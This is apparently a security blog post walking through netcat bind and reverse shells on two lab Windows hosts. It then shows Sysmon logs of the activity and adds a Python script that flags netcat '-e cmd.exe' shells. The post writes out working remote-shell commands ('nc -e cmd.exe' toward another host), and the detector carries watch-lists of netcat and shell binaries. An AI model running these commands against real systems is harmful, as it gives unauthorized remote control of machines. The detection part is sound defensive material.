A small hands-on exercise with netcat remote control and reverse shells

Bind shell (forward shell):

 

On machine A (the .132 host) ==> this is the C2 client side:

nc.exe -L -d -e cmd.exe -p 5555

 

On machine B (the .134 host):

nc64.exe XXX.132 5555

  

You can then type commands to remotely control the .132 machine!

 

My nc binaries are all on the Desktop, so opening cmd on the Desktop is enough!

 

 

Reverse shell example:

On host A (.134), run the following command to listen on port 8888:

C:\Users\qiankun\Desktop>nc -n -lvvp 8888
listening on [any] 8888 ...
connect to [XXX] from (UNKNOWN) [XXX] 53960
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.
 
C:\Users\qiankun\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C6C4-46F7
 
 Directory of C:\Users\qiankun\Desktop
 
08/01/2022  01:23 AM    <DIR>          .
08/01/2022  01:23 AM    <DIR>          ..
05/11/2022  01:09 AM    <DIR>          619f00628d0db414e782dbf0f3739eb6ceffd0036c6c83a17c31e3c2f6bdc266
05/11/2022  08:35 PM    <DIR>          80ffaea12a5ffb502d6ce110e251024e7ac517025bf95daa49e6ea6ddd0c7d5b
05/16/2022  12:38 AM    <DIR>          aaabitsadmin.exe.ps1
05/16/2022  12:30 AM               616 aaabitsadmin.exe.ps1.zip
05/24/2022  12:13 AM                 0 Add-ConstrainedDelegationBackdoor.ps1
05/30/2022  10:32 PM       104,857,751 Agent.log
05/23/2022  02:38 AM                 3 agent.ps1
06/13/2022  02:14 AM         8,447,018 Agent_1.log
06/09/2022  11:48 PM    <DIR>          b05d367d0ae1022d53926c052c9bfd8cb62745cc.rl
06/09/2022  11:37 PM         1,324,365 b05d367d0ae1022d53926c052c9bfd8cb62745cc.rl.zip
04/26/2022  07:55 PM               208 bitsadmin.exe.ps1
08/04/2017  02:19 AM            75,418 COM Object hijacking persistence.ps1
04/21/2022  02:30 AM    <DIR>          dev
04/14/2022  11:22 PM               167 exit.bat
03/24/2022  08:41 AM             2,348 Microsoft Edge.lnk
04/19/2022  12:30 AM            24,896 msxsl.exe
07/31/2022  09:00 PM            38,616 nc.exe
07/31/2022  09:00 PM            45,272 nc64.exe
08/01/2022  01:14 AM         5,980,919 nc_miansha.exe
04/13/2022  11:23 PM         1,436,160 NeverLose.bin.exe
05/23/2022  02:37 AM                 0 New Text Document.txt
05/23/2022  02:49 AM    <DIR>          nishang-master
05/23/2022  02:39 AM            80,249 nishang-master.zip
06/10/2022  12:42 AM    <DIR>          Office Tool
06/09/2022  11:54 PM     2,085,551,571 Office Tool.zip
05/18/2022  02:43 AM    <DIR>          phpStudy_64
05/17/2022  07:55 PM        81,485,042 phpStudy_64.zip
07/31/2022  10:04 PM    <DIR>          PSTools
07/31/2022  09:10 PM         4,089,627 PSTools.zip
05/23/2022  11:39 PM    <DIR>          QianKunEDR-Windows-x64-Setup
07/31/2022  07:11 PM    <DIR>          QianKunEDR-Windows-x64-Setup (5)
07/31/2022  06:51 PM        90,915,906 QianKunEDR-Windows-x64-Setup (5).zip
05/23/2022  11:28 PM       108,074,453 QianKunEDR-Windows-x64-Setup.zip
04/14/2022  11:22 PM                65 start.bat
05/06/2022  02:25 AM    <DIR>          Sysmon
05/06/2022  02:14 AM         3,263,064 Sysmon.zip
05/16/2022  02:44 AM    <DIR>          test
05/24/2022  02:10 AM            10,522 test.chm
07/31/2022  06:46 PM         3,607,096 winrarx64.610scp.exe
05/07/2022  12:53 AM    <DIR>          x64
04/14/2022  02:30 AM             1,892 XXX.sct
              27 File(s)  2,499,313,244 bytes
              16 Dir(s)  17,187,168,256 bytes free
 
C:\Users\qiankun\Desktop>whoami
whoami
desktop-gem2odd\qiankun
 
C:\Users\qiankun\Desktop>ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet:
 
   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : XXX
   IPv4 Address. . . . . . . . . . . : XXXX
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : XXX

  

On machine B (.132), run the following command to connect out to machine A:

nc XXX.134IP 8888 -t -e cmd.exe

 

Machine B can then be controlled from machine A (.134).

 

Data collection and detection:

Date and Time   Source  Event ID   Task Category
2022/11/15 17:42    Microsoft-Windows-Sysmon    18  Pipe Connected (rule: PipeEvent)    "Pipe Connected:
RuleName: -
EventType: ConnectPipe
UtcTime: 2022-11-15 09:42:51.576
ProcessGuid: {95699A2E-0F5B-6373-0119-040000000C00}
ProcessId: 1908
PipeName: \lsass
Image: C:\Windows\system32\mmc.exe
User: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    1   Process Create (rule: ProcessCreate)    "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:31.750
ProcessGuid: {95699A2E-5E8F-6373-7519-040000000C00}
ProcessId: 3440
Image: C:\Windows\System32\whoami.exe
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
Description: whoami - displays logged on user information
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: whoami.exe
CommandLine: whoami
CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
User: dw-PC\dw
LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
LogonId: 0xcc239
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=EC2231C0FEA6B821A5ED097419744205,SHA256=C36CF78F2257F606AB67B14AFB02DCA652A3FA6907C7805EFBD2D47241EE609A,IMPHASH=33138CA52B3F4A94BA90037F3DE01CB2
ParentProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}
ParentProcessId: 5016
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe
ParentUser: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    1   Process Create (rule: ProcessCreate)    "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:20.362
ProcessGuid: {95699A2E-5E84-6373-7419-040000000C00}
ProcessId: 4808
Image: C:\Windows\System32\ipconfig.exe
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
Description: IP Configuration Utility
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: ipconfig.exe
CommandLine: ipconfig
CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
User: dw-PC\dw
LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
LogonId: 0xcc239
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=CF45949CDBB39C953331CDCB9CEC20F8,SHA256=34DF739526C114BB89470B3B650946CBF7335CB4A2206489534FB05C1FC143A8,IMPHASH=BBBA00511B8BEF70143B0EEBBB337273
ParentProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}
ParentProcessId: 5016
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: cmd.exe
ParentUser: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    3   Network connection detected (rule: NetworkConnect)  "Network connection detected:
RuleName: Usermode
UtcTime: 2022-10-14 17:11:18.718
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw
Protocol: tcp
Initiated: true
SourceIsIpv6: false
SourceIp: 192.168.203.128
SourceHostname: dw-PC.localdomain
SourcePort: 49405
SourcePortName: -
DestinationIsIpv6: false
DestinationIp: 192.168.203.130
DestinationHostname: -
DestinationPort: 7777
DestinationPortName: -"
2022/11/15 17:40    Microsoft-Windows-Sysmon    1   Process Create (rule: ProcessCreate)    "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}
ProcessId: 5016
Image: C:\Windows\System32\cmd.exe
FileVersion: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Description: Windows Command Processor
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: Cmd.Exe
CommandLine: cmd.exe
CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
User: dw-PC\dw
LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
LogonId: 0xcc239
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A
ParentProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ParentProcessId: 3876
ParentImage: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
ParentCommandLine: nc64.exe  -e cmd.exe 192.168.203.130 7777
ParentUser: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    18  Pipe Connected (rule: PipeEvent)    "Pipe Connected:
RuleName: -
EventType: ConnectPipe
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
PipeName: <Anonymous Pipe>
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw"
2022/11/15 17:40    Microsoft-Windows-Sysmon    17  Pipe Created (rule: PipeEvent)  "Pipe Created:
RuleName: -
EventType: CreatePipe
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
PipeName: <Anonymous Pipe>
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    18  Pipe Connected (rule: PipeEvent)    "Pipe Connected:
RuleName: -
EventType: ConnectPipe
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
PipeName: <Anonymous Pipe>
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    17  Pipe Created (rule: PipeEvent)  "Pipe Created:
RuleName: -
EventType: CreatePipe
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
PipeName: <Anonymous Pipe>
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
User: dw-PC\dw"
 
 
2022/11/15 17:40    Microsoft-Windows-Sysmon    1   Process Create (rule: ProcessCreate)    "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
ProcessId: 3876
Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
FileVersion: -
Description: -
Product: -
Company: -
OriginalFileName: -
CommandLine: nc64.exe  -e cmd.exe 192.168.203.130 7777
CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
User: dw-PC\dw
LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
LogonId: 0xcc239
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: MD5=523613A7B9DFA398CBD5EBD2DD0F4F38,SHA256=3E59379F585EBF0BECB6B4E06D0FBBF806DE28A4BB256E837B4555F1B4245571,IMPHASH=567531F08180AB3963B70889578118A3
ParentProcessGuid: {95699A2E-5924-6373-6B19-040000000C00}
ParentProcessId: 2680
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: ""C:\Windows\System32\cmd.exe""
ParentUser: dw-PC\dw"
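The Sysmon export above shows the full chain a defender can key on: an Event ID 1 for nc64.exe whose CommandLine carries `-e cmd.exe`, an Event ID 3 outbound TCP connection initiated by that same process (Initiated: true), Event ID 17/18 anonymous-pipe events from it, and then an Event ID 1 for cmd.exe whose ParentImage is nc64.exe. The following Python script is an added example, not code from the original post: it parses a text export in the same "header line, then Key: Value lines" shape and applies those three rules, correlating the network event to the child shell through ProcessGuid/ParentProcessGuid. The embedded records, the hostnames, GUIDs and 192.0.2.x addresses are constructed for this example; the binary names in NETCAT_NAMES and SHELL_NAMES are an assumed watch-list you would extend for your environment.

```python
"""Flag netcat-style bind/reverse shells in a Sysmon text export.

Added example (not from the original post). Input format mirrors the text
export shown on the page: one header line per event, then "Key: Value" lines.
All sample records below are constructed; GUIDs and IPs are placeholders.
"""
import re

SAMPLE_EXPORT = """\
2022/11/15 17:40    Microsoft-Windows-Sysmon    3   Network connection detected (rule: NetworkConnect)  "Network connection detected:
RuleName: Usermode
UtcTime: 2022-11-15 09:40:12.100
ProcessGuid: {AAAAAAAA-0001-0000-0000-000000000001}
ProcessId: 3876
Image: C:\\Users\\dw\\Desktop\\tools\\nc64.exe
User: dw-PC\\dw
Protocol: tcp
Initiated: true
SourceIp: 192.0.2.10
SourcePort: 49405
DestinationIp: 192.0.2.20
DestinationPort: 7777"
2022/11/15 17:40    Microsoft-Windows-Sysmon    1   Process Create (rule: ProcessCreate)    "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:40:12.203
ProcessGuid: {AAAAAAAA-0002-0000-0000-000000000002}
ProcessId: 5016
Image: C:\\Windows\\System32\\cmd.exe
CommandLine: cmd.exe
User: dw-PC\\dw
ParentProcessGuid: {AAAAAAAA-0001-0000-0000-000000000001}
ParentProcessId: 3876
ParentImage: C:\\Users\\dw\\Desktop\\tools\\nc64.exe
ParentCommandLine: nc64.exe  -e cmd.exe 192.0.2.20 7777"
2022/11/15 17:41    Microsoft-Windows-Sysmon    1   Process Create (rule: ProcessCreate)    "Process Create:
RuleName: -
UtcTime: 2022-11-15 09:41:00.000
ProcessGuid: {AAAAAAAA-0003-0000-0000-000000000003}
ProcessId: 6100
Image: C:\\Windows\\System32\\notepad.exe
CommandLine: notepad.exe readme.txt
User: dw-PC\\dw
ParentProcessGuid: {AAAAAAAA-0009-0000-0000-000000000009}
ParentImage: C:\\Windows\\explorer.exe
ParentCommandLine: explorer.exe"
"""

# Header line of each record: local time, provider, numeric Event ID.
HEADER_RE = re.compile(r"^(\d{4}/\d{2}/\d{2} \d{2}:\d{2})\s+Microsoft-Windows-Sysmon\s+(\d+)\s+")
# Assumed watch-lists; extend for your environment (e.g. renamed copies).
NETCAT_NAMES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}
SHELL_NAMES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# netcat's "-e <program>" attaches a program's stdio to the socket.
EXEC_FLAG_RE = re.compile(r"(^|\s)-e\s+\S*(cmd|powershell|pwsh|bash|sh)(\.exe)?(\s|$)", re.IGNORECASE)


def parse_events(text):
    """Split the export into one dict per event (Key -> Value, plus EventID)."""
    events = []
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            events.append({"LocalTime": m.group(1), "EventID": int(m.group(2))})
            continue
        if not events or ": " not in line:
            continue
        key, _, value = line.partition(": ")
        # The last field of a record carries the export's closing quote.
        events[-1][key.strip()] = value.strip().rstrip('"')
    return events


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (severity, ProcessGuid, reason) tuples for suspicious events."""
    findings = []
    net_by_guid = {}  # ProcessGuid -> Event ID 3 record, for parent/child correlation
    for ev in events:
        if ev["EventID"] == 3 and basename(ev.get("Image", "")) in NETCAT_NAMES:
            # Initiated=true means the netcat process dialed out (reverse shell);
            # false means it accepted a connection (bind shell).
            direction = "outbound (reverse shell pattern)" if ev.get("Initiated") == "true" else "inbound (bind shell pattern)"
            net_by_guid[ev["ProcessGuid"]] = ev
            findings.append(("MEDIUM", ev["ProcessGuid"],
                             f"netcat {direction} peer {ev.get('DestinationIp')}:{ev.get('DestinationPort')}"))
    for ev in events:
        if ev["EventID"] != 1:
            continue
        if EXEC_FLAG_RE.search(ev.get("CommandLine", "")):
            findings.append(("HIGH", ev["ProcessGuid"], "process launched with netcat -e <shell>"))
        if basename(ev.get("Image", "")) in SHELL_NAMES and basename(ev.get("ParentImage", "")) in NETCAT_NAMES:
            # A shell whose parent already has a socket open is the strongest signal.
            severity = "CRITICAL" if ev.get("ParentProcessGuid") in net_by_guid else "HIGH"
            findings.append((severity, ev["ProcessGuid"], "shell spawned by netcat parent"))
    return findings


if __name__ == "__main__":
    for severity, guid, reason in detect(parse_events(SAMPLE_EXPORT)):
        print(f"[{severity}] {guid}: {reason}")
```

On the page's own export the same rules would fire twice on the nc64.exe process GUID {95699A2E-5E7C-6373-7219-040000000C00}: once for its Event ID 3 to port 7777 and once for the `-e cmd.exe` command line, and then on the child cmd.exe (PID 5016) whose ParentProcessGuid is that GUID.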

  

posted @ bonelee